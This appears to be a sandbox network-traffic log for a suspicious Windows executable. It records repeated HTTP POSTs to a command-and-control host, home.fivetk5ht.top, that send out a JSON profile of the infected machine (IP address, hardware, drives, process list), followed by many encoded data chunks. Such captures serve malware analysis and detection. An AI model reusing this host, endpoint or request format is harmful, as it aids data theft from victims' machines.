Dec 20, 2024 16:44:44.854038954 CET | 2472 | OUT | Data Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
Dec 20, 2024 16:44:44.854091883 CET | 9888 | OUT | Data Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
Dec 20, 2024 16:44:44.854163885 CET | 2472 | OUT | Data Raw: 5c 2f 77 41 2b 39 50 6b 5c 2f 65 62 48 64 49 33 38 76 39 31 5c 2f 72 66 2b 58 66 5c 2f 6c 30 78 33 71 62 79 55 32 6f 37 6a 65 6b 76 5c 2f 4c 50 7a 66 33 48 5c 2f 41 46 39 66 5c 2f 58 37 5c 2f 41 4b 31 57 2b 53 54 39 33 73 2b 65 4d 5c 2f 75 76 33
Data Ascii: \/wA+9Pk\/ebHdI38v91\/rf+Xf\/l0x3qbyU2o7jekv\/LPzf3H\/AF9f\/X7\/AK1W+ST93s+eM\/uv3X+f8\/rPtfOX9fM6Bi\/x7\/kST\/Wnv14\/nz9RQkj4TyX3\/vRF5nSD\/PT\/ADzT9r\/J\/q\/9b\/nv\/npzmmSR\/wAezZ\/00Mvn46+v4\/8A66Pa+cv6+YDNqRyb0+cf62X\/AKbfp\/XHfrS7v3bhPM3x
Dec 20, 2024 16:44:44.854197979 CET | 4944 | OUT | Data Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
Dec 20, 2024 16:44:44.854295015 CET | 4944 | OUT | Data Raw: 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 41 41 53 2b 64 2b 58 39 66 4d 68 6b 5a 32 4c 75 37 37 42 5c 2f 71 5c 2f 38 41 56 57 32 66 38 5c 2f 70 5c 2f 56 6d 33 64 76 64 30 38 6c 35 50 38 5c 2f 54 76 6a
Data Ascii: Isab0kmT\/W++fXr6f5PfP2fn+H\/AAS+d+X9fMhkZ2Lu77B\/q\/8AVW2f8\/p\/Vm3dvd08l5P8\/Tvjn+lPSMbX\/cx7Mfx\/Ti1\/6\/u9Mkz5j\/8AtP8AcQen19+tZmoyPZ5h353\/AOql\/wDkr8P6UwSFvnR8v\/zz\/wCnfHpnr0p+5PnR3+SX7P8A8tf\/ACa\/p1qH5137E8v93\/q4\/wDlt\/pXf9P880HQQyN
Dec 20, 2024 16:44:44.973922968 CET | 14832 | OUT | Data Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
Dec 20, 2024 16:44:45.018131971 CET | 27192 | OUT | Data Raw: 41 78 54 78 65 5a 30 63 56 48 44 59 76 4c 73 74 71 35 62 53 77 43 77 47 47 6a 54 73 4e 38 75 63 39 76 53 76 6c 48 34 37 65 49 37 72 54 50 32 62 50 32 70 66 32 65 50 44 39 39 61 32 48 69 7a 34 77 65 4e 76 68 68 5c 2f 77 67 55 53 36 44 34 68 75 4e
Data Ascii: AxTxeZ0cVHDYvLstq5bSwCwGGjTsN8uc9vSvlH47eI7rTP2bP2pf2ePD99a2Hiz4weNvhh\/wgUS6D4huNYHwv8aaTrWp\/tV6BpPiqysrrRvDmjeL9d+Ef7MDeI9Lvb7S9Q8RQ6CLbTlv7CTxNbt9aMm\/1\/LPFUZtLsLmVZrizs55kBCyzWsMsqgjBCyOjOARwQDyOOlfr\/iv4Z5V4scKf6qZvXqYXCvNsmzOWIoQhKu4ZT
Dec 20, 2024 16:44:45.134721041 CET | 7416 | OUT | Data Raw: 2f 4f 76 70 32 34 6c 79 34 42 50 47 34 5a 5c 2f 50 38 41 7a 6a 74 6a 72 30 72 35 44 74 64 51 62 56 64 54 76 39 54 64 42 47 32 6f 33 39 31 66 4e 47 43 53 49 32 75 72 71 57 63 6f 70 4a 4a 4b 6f 5a 43 6f 4a 35 49 41 7a 58 5c 2f 43 31 78 66 69 76 61
Data Ascii: /Ovp24ly4BPG4Z\/P8Azjtjr0r5DtdQbVdTv9TdBG2o391fNGCSI2urqWcopJJKoZCoJ5IAzX\/C1xfivaU8PC+rxE5pW6QpqMn02dSG+79D\/t4yek4e0dtPZxj03lLR+vut\/JXtc9b0d87CT2GT2PH\/ANbmv56\/27fhVH8LP2hfEht9VbVLb4kRXPxWhWSERTaZJ4u8SeIl1DSpWUlJ1t9W02\/ltJkVD9gntIpQ08Usj\
Dec 20, 2024 16:44:45.302124023 CET | 1236 | OUT | Data Raw: 31 55 71 30 36 58 37 79 55 55 71 62 54 55 64 64 54 5c 2f 4e 58 77 62 34 37 77 6e 68 6c 34 6f 63 46 63 66 59 5c 2f 41 59 6e 4d 38 48 77 74 6e 4e 4c 4e 4d 52 67 4d 4a 55 70 55 63 54 69 71 64 4f 6a 57 70 75 6c 52 71 56 6b 36 55 4a 74 31 55 30 35 72
Data Ascii: 1Uq06X7yUUqbTUddT\/NXwb47wnhl4ocFcfY\/AYnM8HwtnNLNMRgMJUpUcTiqdOjWpulRqVk6UJt1U05rl0aZ+jv7FP\/AATw+OX7QHxW8Tfte\/tL+OfFnhn48fCr9rjwfeXXg\/XdHmuG1O9+FXivwZ4y8Wx6xcXZDpoereHp7XRPhmPDkq6Hp+n2un39vLqHh2awtY\/xl\/4Km\/s7+MPiF\/wUI\/ar8X6VPGthqvxPuU
Dec 20, 2024 16:44:45.510202885 CET | 1236 | OUT | Data Raw: 53 72 5a 4c 77 6e 6c 4f 52 35 58 6a 4d 79 70 30 4b 74 62 44 30 4d 78 78 6d 44 72 34 32 68 68 71 39 66 44 30 63 52 43 6a 58 72 51 6e 48 54 4e 70 5c 2f 76 48 5c 2f 50 34 30 2b 72 2b 6a 36 54 72 58 69 54 58 4e 4b 38 4c 2b 46 39 41 38 52 65 4c 50 46
Data Ascii: SrZLwnlOR5XjMyp0KtbD0MxxmDr42hhq9fD0cRCjXrQnHTNp\/vH\/P40+r+j6TrXiTXNK8L+F9A8ReLPFGuyXUOh+F\/CXh\/WvFXiXWprKyn1G8i0nw\/4fsdS1fUpLTT7W6vrhLOymaGztri5kCwwyOv7tiMRQwlCricVWo4bDUKc6tfEYipCjQo0oJynVq1ako06dOEU5TnOSjFJttI\/jrC0MXjsRRweCw1bF4vE1I0cPh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49733 | 185.121.15.192 | 80 | 3148 | C:\Users\user\Desktop\5ZH9uXmzGP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:44:46.490637064 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
Host: home.fivetk5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 500630
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:44:46.611917019 CET | 2472 | OUT | Data Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
Dec 20, 2024 16:44:46.611963987 CET | 2472 | OUT | Data Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
Dec 20, 2024 16:44:46.612021923 CET | 2472 | OUT | Data Raw: 66 36 5a 63 6d 65 78 76 62 5a 35 74 51 75 56 45 4e 31 62 50 41 37 4a 4c 6d 4a 6a 76 64 5c 2f 66 64 65 2b 46 76 77 30 38 53 2b 5a 4a 65 2b 46 6c 30 53 2b 6b 33 75 32 70 65 44 62 70 64 41 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31
Data Ascii: f6ZcmexvbZ5tQuVEN1bPA7JLmJjvd\/fde+Fvw08S+ZJe+Fl0S+k3u2peDbpdAaSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxT
Dec 20, 2024 16:44:46.612323046 CET | 2472 | OUT | Data Raw: 54 33 4d 33 39 4c 50 6a 54 34 69 65 44 5c 2f 41 49 74 61 78 2b 77 44 38 53 66 68 5c 2f 72 56 72 34 69 38 47 65 4e 50 6a 39 72 76 69 44 77 39 72 46 70 75 45 64 33 59 58 33 37 47 6e 37 57 54 6f 4a 49 70 41 73 31 70 65 57 30 6e 6d 57 6d 6f 57 46 79
Data Ascii: T3M39LPjT4ieD\/AItax+wD8Sfh\/rVr4i8GeNPj9rviDw9rFpuEd3YX37Gn7WToJIpAs1peW0nmWmoWFykV5p9\/Bc2N5DDdW80Sfzu\/8FYMt+3J8Vcc7dG+GS\/T\/i2fhNv\/AGav2L6LWFp4Hxs4c9llccjxGN4I4o\/tTLaU8yUaeMwed5rl1SnVpZnjMZi6U4LLMMq1CrWcaeIpOSp05aL+dfppYqeO+j3xP7XM3ntDB
Dec 20, 2024 16:44:46.612395048 CET | 4944 | OUT | Data Raw: 50 38 41 51 30 39 6c 37 45 66 35 39 52 55 63 6e 62 38 66 36 55 48 51 52 31 48 35 66 76 38 41 70 5c 2f 38 41 58 71 53 69 67 31 68 74 38 5c 2f 30 52 56 5a 64 33 34 56 44 5c 2f 41 4f 67 66 35 5c 2f 44 70 5c 2f 6e 46 58 50 4c 39 5c 2f 30 5c 2f 38 41
Data Ascii: P8AQ09l7Ef59RUcnb8f6UHQR1H5fv8Ap\/8AXqSig1ht8\/0RVZd34VD\/AOgf5\/Dp\/nFXPL9\/0\/8Ar1WaP2+T+QH+eMZ96Dp9\/wDu\/iQyLj7\/APy09e2P8\/ln0qIb\/wCPPtn\/ADj06VYl\/i\/D+lR+X7\/p\/wDXoNqfX5fqR1A3fZ\/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/wAs+3\/1vp
Dec 20, 2024 16:44:46.613687992 CET | 2472 | OUT | Data Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
Dec 20, 2024 16:44:46.613845110 CET | 4944 | OUT | Data Raw: 4f 4a 4b 32 44 77 4d 36 38 63 46 53 78 57 4a 64 47 72 48 2b 6b 4d 44 77 62 6e 4e 48 4e 63 34 7a 44 68 66 77 74 78 76 42 48 46 50 45 6c 48 4d 38 46 6a 2b 4b 38 39 34 79 79 7a 50 4f 47 75 48 4b 65 65 34 71 6e 6a 63 2b 7a 44 68 66 4a 63 75 7a 33 4d
Data Ascii: OJK2DwM68cFSxWJdGrH+kMDwbnNHNc4zDhfwtxvBHFPElHM8Fj+K894yyzPOGuHKee4qnjc+zDhfJcuz3MMXWxmNxdNY6nhf7D4boYvHwoSxtbC4ZVqMvzo\/as+Cmufs7\/APBIf9mr4Q+KIzb+J\/DvxI8J6j4lsWkSV9K8ReNNP+MHjzXNFeWMvFLJouq+JLvSZJIXkt5Hs2a3lkhMbt+DWw+3+fwr+p7\/AILRnH7JHhgf3
Dec 20, 2024 16:44:46.615166903 CET | 2472 | OUT | Data Raw: 30 52 74 52 6d 30 2b 44 56 62 36 47 77 58 55 64 51 67 61 38 6c 73 39 4d 76 37 71 4f 33 45 6a 32 39 6e 63 79 68 49 48 35 58 51 66 69 42 34 5a 31 36 4b 37 61 44 57 4e 47 57 57 7a 31 6a 56 4e 44 6c 6a 54 56 62 64 31 6c 76 64 49 75 6d 74 4c 6f 32 76
Data Ascii: 0RtRm0+DVb6GwXUdQga8ls9Mv7qO3Ej29ncyhIH5XQfiB4Z16K7aDWNGWWz1jVNDljTVbd1lvdIumtLo2vnra3EsJlQmJntYZChUvFGxKD8Rwvg39HbB8XclDg\/hP\/AFkrYOWaRyutPE4rAfU6denQliqGQ4rFVsgpRhXqUqf7jAQnCU4WilKLf9GYzx9+lTmHArliOPuOv9UcNj6eTVM5w9PC4LM\/r+Jw2IxNPBYnibB4LD
Dec 20, 2024 16:44:46.731858969 CET | 4944 | OUT | Data Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
Dec 20, 2024 16:44:46.731914997 CET | 2472 | OUT | Data Raw: 78 4f 67 48 36 5c 2f 68 5c 2f 55 31 58 66 72 2b 46 53 31 42 4a 5c 2f 77 42 38 66 35 5c 2f 7a 37 2b 39 42 30 46 64 67 5c 2f 77 44 63 2b 54 5c 2f 70 6e 6e 31 39 76 77 5c 2f 7a 6d 6d 4e 6e 76 36 6a 70 5c 2f 72 2b 6e 62 33 71 77 6e 33 52 2b 50 38 7a
Data Ascii: xOgH6\/h\/U1Xfr+FS1BJ\/wB8f5\/z7+9B0Fdg\/wDc+T\/pnn19vw\/zmmNnv6jp\/r+nb3qwn3R+P8zUUkf9\/wD7a\/569z\/kCg0+s\/1b\/wC1Gbj\/AL57\/wD18fpVaSP5vub383\/nr+nf\/Hp2qz93Zv8An4\/1kf8AqP8AI\/Ombfmf+NP8\/n+ff35Dpht8\/wBEU\/nXYj+nP+PaoV\/jznzP+mn+fXP\/AOqr


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549734185.121.15.192803148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:44:48.303504944 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500630
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 16:44:48.423373938 CET2472OUTData Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
                                                          Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
                                                          Dec 20, 2024 16:44:48.423413992 CET | 2472 bytes | OUT | Data Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
                                                          Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
                                                          Dec 20, 2024 16:44:48.423439026 CET | 4944 bytes | OUT | Data Raw: 66 36 5a 63 6d 65 78 76 62 5a 35 74 51 75 56 45 4e 31 62 50 41 37 4a 4c 6d 4a 6a 76 64 5c 2f 66 64 65 2b 46 76 77 30 38 53 2b 5a 4a 65 2b 46 6c 30 53 2b 6b 33 75 32 70 65 44 62 70 64 41 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31
                                                          Data Ascii: f6ZcmexvbZ5tQuVEN1bPA7JLmJjvd\/fde+Fvw08S+ZJe+Fl0S+k3u2peDbpdAaSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxT
                                                          Dec 20, 2024 16:44:48.423491955 CET | 2472 bytes | OUT | Data Raw: 50 38 41 51 30 39 6c 37 45 66 35 39 52 55 63 6e 62 38 66 36 55 48 51 52 31 48 35 66 76 38 41 70 5c 2f 38 41 58 71 53 69 67 31 68 74 38 5c 2f 30 52 56 5a 64 33 34 56 44 5c 2f 41 4f 67 66 35 5c 2f 44 70 5c 2f 6e 46 58 50 4c 39 5c 2f 30 5c 2f 38 41
                                                          Data Ascii: P8AQ09l7Ef59RUcnb8f6UHQR1H5fv8Ap\/8AXqSig1ht8\/0RVZd34VD\/AOgf5\/Dp\/nFXPL9\/0\/8Ar1WaP2+T+QH+eMZ96Dp9\/wDu\/iQyLj7\/APy09e2P8\/ln0qIb\/wCPPtn\/ADj06VYl\/i\/D+lR+X7\/p\/wDXoNqfX5fqR1A3fZ\/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/wAs+3\/1vp
                                                          Dec 20, 2024 16:44:48.423574924 CET | 2472 bytes | OUT | Data Raw: 5c 2f 77 41 2b 39 50 6b 5c 2f 65 62 48 64 49 33 38 76 39 31 5c 2f 72 66 2b 58 66 5c 2f 6c 30 78 33 71 62 79 55 32 6f 37 6a 65 6b 76 5c 2f 4c 50 7a 66 33 48 5c 2f 41 46 39 66 5c 2f 58 37 5c 2f 41 4b 31 57 2b 53 54 39 33 73 2b 65 4d 5c 2f 75 76 33
                                                          Data Ascii: \/wA+9Pk\/ebHdI38v91\/rf+Xf\/l0x3qbyU2o7jekv\/LPzf3H\/AF9f\/X7\/AK1W+ST93s+eM\/uv3X+f8\/rPtfOX9fM6Bi\/x7\/kST\/Wnv14\/nz9RQkj4TyX3\/vRF5nSD\/PT\/ADzT9r\/J\/q\/9b\/nv\/npzmmSR\/wAezZ\/00Mvn46+v4\/8A66Pa+cv6+YDNqRyb0+cf62X\/AKbfp\/XHfrS7v3bhPM3x
